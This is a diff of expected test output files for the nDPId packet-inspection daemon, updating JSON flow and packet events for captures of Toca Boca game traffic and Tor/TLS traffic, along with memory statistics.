-00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649411716027,"flow_last_seen":1649411718310,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":15,"flow_first_seen":1649411716027,"flow_last_seen":1649411718310,"flow_idle_time":200000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":473,"flow_tot_l4_payload_len":1670,"flow_avg_l4_payload_len":111,"midstream":0,"thread_ts_msec":1649756653649,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.123","src_port":35671,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":74,"packets-processed":73,"total-skipped-flows":0,"total-l4-payload-len":8724,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":17,"total-idle-flows":16,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1649949002676} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02089{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":74,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1649949002676,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1649949002676,"pkt":"YDjgxTWgeJS0JASgCABFAATMcx8AADsRl01bx1HhwKgCZBO\/xKEEuJV9AAAAAbaSYs0pd\/HxCAABAAAABKQAAAAFAAAABQAAAAsAAAAAAAAtKgAAAADzBOYB3hXbAQcgYnVzY28gYW1pZ29zIHNveSBwb2xpY2lhIGZyYW5jZXMVBwcCc3QG8KfG20BqSUED\/RwD\/AMKBwJtZAMBBwJtcAMeBwJzdiID\/wMKBwU0OTExMhUHBwJzdAYOLbLdRgoyQQP9HAP8AwoHAm1kAwEHAm1wAxkHAnN2IgP\/AwoHB1NoZXJsb24VBwcCc3QGcT0Kp+h8QkED\/RwD\/AMKBwJtZAMBBwJtcAMFBwJzdiID\/wMKBxNnYXRvcyBnYW1lXzEwOjUzOjMyFQcHAnN0BjeJQaB7OklBA\/0cA\/wDCgcCbWQDAQcCbXADDwcCc3YDAQP\/AwoHCTEwMDAwNDAwMBUHBwJzdAbjpZt0D0BJQQP9HAP8AwoHAm1kAwEHAm1wAwcHAnN2IgP\/AwoHCeaIkeeahOWPkRUHBwJzdAaWQ4v8vMVJQQP9HAP8AwYHAm1kAwEHAm1wAxQHAnN2IgP\/AwYHEHB2cCBoYXJkZWNvcvCfkoAVBwcCc3QG\/tR42XVFSUED\/RwD\/AMJBwJtZAMBBwJtcAMPBwJzdiID\/wMKBwU0MzY4MhUHBwJzdAbn+6nx3kJJQQP9HAP8AwoHAm1kAwEHAm1wAxwHAnN2IgP\/AwoHBGJvdDMVBwcCc3QGAAAAkNDkSUED\/RwD\/AMKBwJtZAMBBwJtcAMeBwJzdiID\/wMKBw4gZ2FtZV8wMjozNTo0MxUHBwJzdAYzMzNDUqhJQQP9HAP8AwoHAm1kAwEHAm1wIgcCc3YDAQP\/AwoHCkdUQSBWIGxpZmUVBwcCc3QGqvHS3eg1SUED\/RwD\/AMKBwJtZAMBBwJtcAMBBwJzdiID\/wMKBxPRg9GDMSBnYW1lXzA2OjE0OjIwFQcHAnN0BrByaKHFz0ZBA\/0cA\/wDCgcCbWQDAQcCbXADCwcCc3YDAQP\/AwoHBTY1MjIwFQcHAnN0BolBYKUCYEdBA\/0cA\/wDCgcCbWQDAQcCbXAiBwJzdiID\/wMKBwU4MTU0OBUHBwJzdAbfT433oXoxQQP9HAP8AwoHAm1kAwEHAm1wAx4HAnN2IgP\/AwoHDiBnYW1lXzA0OjMwOjQxFQcHAnN0BqabxBDRRUlBA\/0cA\/wDCgcCbWQDAQcCbXADHQcCc3YDAQP\/AwoHBTI4NjQ1FQcHAnN0Bi2ynf8p6kpBA\/0cA\/wDCgcCbWQDAQcCbXADFQcCc3YiA\/8DCgcFMTMxNjUVBwcCc3QGvHSTeDIhQ0ED\/RwD\/AMKBwJtZAMBBwJtcAMVBwJzdiID\/wMKBwU0NDg2OBUHBwJzdAYZBFbuLowxQQP9HAP8AwoHAm1kAwEHAm1wAw0HAnN2IgP\/AwoHCWphamFqYWphahUHBwJzdAYbL90E6kNDQQP9HAP8AwoHAm1kAwEHAm1wAx4HAnN2IgP\/AwoHBDcxNjAVBwcCc3QGj8L16LZhMkED\/RwD\/AMKBwJtZCIHAm1wAxsHAnN2IgP\/AwoHBuWSjOW5sxUHBwJzdAacxCBQ\/Po0QQP9HAP8AwoHAm1kAwIHAm1wAwMHAnN2"} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649756653649,"flow_last_seen":1649756653649,"flow_idle_time":200000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1649949002676,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":34503,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00559{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":75,"packets-processed":74,"total-skipped-flows":0,"total-l4-payload-len":9924,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":16,"total-detection-updates":0,"total-updates":0,"current-active-flows":1,"total-active-flows":18,"total-idle-flows":17,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":89,"global_ts_msec":1649959918209} 00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02058{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1649959918209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1649959918209,"pkt":"YDjgxTWgeJS0JASgCABFAATMlmcAADsRdGxbx1F6wKgCZBO\/3lgEuGJXAAAAAbv54rwVf+7RCAABAAAABKQAAAAFAAAABQAAAB4AAAAAAACDaAAAAADzBOYAAd5oAfRzAAkyNTY1ODIyODNoAAhi\/W8BcwACTFZzAARNYWxscwACQ0x5AARpAAAAAgAAAAMAAAAEAAAABXMAAkNUcwABQWL8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAKMTM2MDA2OTEyNWgABGL\/YgpzAAJMVnMABlNjaG9vbGL9bwFi\/GIHcwAKMjExMDU4MjkwNGgACGL9bwFzAAJMVnMABlNjaG9vbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAGRGlncmVmYvxiB3MAAkNQcwAAcwACQ0dvAWL\/YgpzAAg5OTY4MzY0MmgACGL9bwFzAAJMVnMABE1hbGxzAAJDTHkAAWkAAAAFcwACQ1RzAAFRYvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAkxNTUyMTI1OTdoAAhi\/W8BcwACTFZzAAdGYWN0b3J5cwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAjZgdin2LHYs2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAKMTc2NjI2NTIyN2gACGL9bwFzAAJMVnMACEhhbmdhclYycwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAARCYW5pYvxiCXMAAkNQcwAAcwACQ0dvAWL\/YgpzAAg5MTc3MDA5N2gACGL9bwFzAAJMVnMABk9mZmljZXMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAEWmFza2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAJNzU4NjQ3NzY4aAAIYv1vAXMAAkxWcwAETWFsbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwADY2F0YvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAoxNzMzNTE4NjcyaAAIYv1vAXMAAkxWcwAETWFsbHMAAkNMeQAGaQAAAAAAAAABAAAAAgAAAAMAAAAEAAAABXMAAkNUcwAFVmlyZ2li\/GIKcwACQ1BzAABzAAJDR28BYv9iCnMACTg0ODM1MzYzN2gACGL9bwFzAAJMVnMACEhhbmdhclYycwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAdnaXltZXJ0YvxiCnMAAkNQcwAAcwACQ0dvAWL\/YgpzAAoxNzQ5OTgwOTQ2aAAIYv1vAXMAAkxWcwAGU2Nob29scwACQ0x5AAZpAAAAAAAAAAEAAAACAAAAAwAAAAQAAAAFcwACQ1RzAAZ2dnZ2dnZi\/GIJcwACQ1BzAABzAAJDR28BYv9iCnMACjE1ODg5MTA3NDVoAAhi\/W8BcwACTFZzAAZTY2hvb2xzAAJDTHkABmkAAAAAAAAAAQAAAAIAAAADAAAABAAAAAVzAAJDVHMABjExMjIzM2L8YgpzAAJDUHMAAHMAAkNHbwFi\/2IKcwAJNzY2Njk2NjY0aAAE"} 00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_packet_id":1,"flow_last_seen":1649959918209,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":55,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":55,"pkt_l4_len":21,"thread_ts_msec":1649959918209,"pkt":"eJS0JASgYDjgxTWgCABFAAApx\/wAAD8RQyTAqAJkW8dR0LAoE78AFYZHfX19fX19fX19fX19VA=="} -00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00637{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":76,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649949002676,"flow_last_seen":1649949002676,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1649959918209,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":50337,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00560{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":76,"total-skipped-flows":0,"total-l4-payload-len":11137,"total-not-detected-flows":0,"total-guessed-flows":2,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":2,"total-active-flows":20,"total-idle-flows":18,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":97,"global_ts_msec":1650009948783} @@ -99,7 +99,7 @@ 02095{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1650009948783,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1242,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1242,"pkt_l4_len":1208,"thread_ts_msec":1650009948783,"pkt":"YDjgxTWgeJS0JASgCABFAATMx5YAADsRQtZbx1HhwKgCZBO\/qI8EuNNNAAAAAbo0YlQBhGKwCAABAAAABKQAAAAIAAAABQAAAAgAAAADAAAj7AAADYwDAgcCbXAiBwJzdiID\/wMKBwU1NDI1ORUHBwJzdAb0\/dQYS1k2QQP9HAP8AwEHAm1kIgcCbXADDQcCc3YiA\/8DAgdI0LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtdC10LXQtSBnYW1lXzEwOjI3OjAxFQcHAnN0BnsUrmeuBTZBA\/0cA\/wDAQcCbWQDAQcCbXADHgcCc3YDAQP\/AwoHCEdhbWU4NjgzFQcHAnN0BvLSTULOBjZBA\/0cA\/wDAQcCbWQDAgcCbXADIAcCc3YiA\/8DAQcIR2FtZTIxMjkVBwcCc3QG8tJNsnClS0ED\/RwD\/AMBBwJtZAMCBwJtcAMWBwJzdiID\/wMBBwNvcmEVBwcCc3QG+n5qXFaeS0ED\/RwD\/AMHBwJtZAMCBwJtcAMgBwJzdiID\/wMKBwhHYW1lNTA4NBUHBwJzdAakcD2aTKZLQQP9HAP8AwEHAm1kAwIHAm1wAxUHAnN2IgP\/AwEHCEdhbWU2ODM3FQcHAnN0BlpkO2+BpEtBA\/0cA\/wDAQcCbWQDAgcCbXADGwcCc3YiA\/8DAQcIR2FtZTc1MDIVBwcCc3QGxSCwkiDnREED\/RwD\/AMBBwJtZAMCBwJtcAMZBwJzdiID\/wMBBwhHYW1lODMzNRUHBwJzdAamm8TQnahLQQP9HAP8AwEHAm1kAwIHAm1wIgcCc3YiA\/8DAQcIR2FtZTg5MjYVBwcCc3QGtvP9xMypS0ED\/RwD\/AMBBwJtZAMCBwJtcAMeBwJzdiID\/wMBBwRtZW1lFQcHAnN0Bq5H4YrzN0lBA\/0cA\/wDAgcCbWQDAgcCbXADHgcCc3YiA\/8DAgcIR2FtZTMxMjUVBwcCc3QGHVpkG0xbNkED\/RwD\/AMBBwJtZAMCBwJtcAMdBwJzdiID\/wMBBwhHYW1lNDQxMxUHBwJzdAYzMzMT7lo2QQP9HAP8AwEHAm1kAwIHAm1wAw4HAnN2IgP\/AwEHAzAwMBUHBwJzdAb+1Hi5oeZEQQP9HAP8AwIHAm1kAwIHAm1wAx4HAnN2IgP\/AwIHCEdhbWUyMDU4FQcHAnN0Bilcj7LI5kRBA\/0cA\/wDAQcCbWQDAgcCbXADBwcCc3YiA\/8DAQcIR2FtZTQ2OTYVBwcCc3QGoBovvVRbNkED\/RwD\/AMBBwJtZAMCBwJtcAMQBwJzdiID\/wMBBwUyMzQzMBUHBwJzdAZWDi2CBeZEQQP9HAP8AwEHAm1kAwIHAm1wAxsHAnN2IgP\/AwoHCEdhbWU3NDUzFQcHAnN0BhkEVo6EOUlBA\/0cA\/wDAQcCbWQDAgcCbXADDQcCc3YiA\/8DAQcFNjA4NDIVBwcCc3QGuB6Fq9mpS0ED\/RwD\/AMBBwJtZAMCBwJtcAMQBwJzdiID\/wMKBwRPa3VsFQcHAnN0BkSLbMc\/WzZBA\/0cA\/wDAwcCbWQDAQcCbXADFAcCc3YiA\/8DCgcIR2FtZTQzODYVBwcCc3QGYhBYacWlS0ED\/RwD\/AMBBwJtZAMCBwJtcAMV"} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.122","dst_ip":"192.168.2.100","src_port":5055,"dst_port":56920,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} +00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1649959918209,"flow_last_seen":1649959918209,"flow_idle_time":200000,"flow_min_l4_payload_len":13,"flow_max_l4_payload_len":13,"flow_tot_l4_payload_len":13,"flow_avg_l4_payload_len":13,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"192.168.2.100","dst_ip":"91.199.81.208","src_port":45096,"dst_port":5055,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00654{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650009948783,"flow_last_seen":1650009948783,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43151,"l4_proto":"udp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TocaBoca","breed":"Fun","category":"Game"}} 00593{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1650009948783,"flow_last_seen":1650009948783,"flow_idle_time":200000,"flow_min_l4_payload_len":1200,"flow_max_l4_payload_len":1200,"flow_tot_l4_payload_len":1200,"flow_avg_l4_payload_len":1200,"midstream":0,"thread_ts_msec":1650009948783,"l3_proto":"ip4","src_ip":"91.199.81.225","dst_ip":"192.168.2.100","src_port":5055,"dst_port":43151,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00563{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":77,"source":"toca-boca.pcap","alias":"nDPId-test","packets-captured":77,"packets-processed":77,"total-skipped-flows":0,"total-l4-payload-len":12337,"total-not-detected-flows":0,"total-guessed-flows":4,"total-detected-flows":17,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":21,"total-idle-flows":21,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":105,"global_ts_msec":1650009948783} @@ -111,9 +111,9 @@ ~~ total active/idle flows...: 21/21 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5892876 bytes -~~ total memory freed........: 5892876 bytes -~~ total allocations/frees...: 118271/118271 +~~ total memory allocated....: 6026510 bytes +~~ total memory freed........: 6026510 bytes +~~ total allocations/frees...: 121033/121033 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 461 chars ~~ json string max len.......: 2100 chars diff --git a/test/results/tor.pcap.out b/test/results/tor.pcap.out index ffb8242e3..a0cd17ae6 100644 --- a/test/results/tor.pcap.out +++ b/test/results/tor.pcap.out @@ -10,31 +10,31 @@ 00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1383821665420,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665420,"pkt":"UlQA2EYhUlQAWul3CABFAAA0A15AAIAGe0DAqAH8W49d8semAbvp\/8nSAAAAAIACIABVtgAAAgQFtAEDAwgBAQQC"} 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1383821665491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1383821665491,"pkt":"UlQAWul3UlQA2EYhCABFAAA0AABAAC4G0J5bj13ywKgB\/AG7x6b4Wbj86f\/J04ASOQiLRwAAAgQFtAEBBAIBAwMH"} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1383821665491,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1383821665491,"pkt":"UlQA2EYhUlQAWul3CABFAAAoA19AAIAGe0vAqAH8W49d8semAbvp\/8nT+Fm4\/VAQAQAEIgAAAAAAAAAA"} -00941{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1383821665420,"flow_last_seen":1383821665498,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":215,"flow_tot_l4_payload_len":215,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1383821665498,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"www.ct7ctrgb6cr7.com","ja3":"581a3c7f54555512b8cd16e87dfe165b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} -01153{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":9,"source":"tor.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1383821665420,"flow_last_seen":1383821665606,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":748,"flow_tot_l4_payload_len":963,"flow_avg_l4_payload_len":160,"midstream":0,"thread_ts_msec":1383821665606,"l3_proto":"ip4","src_ip":"192.168.1.252","dst_ip":"91.143.93.242","src_port":51110,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"7": {"risk":"Obsolete TLS (v1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": 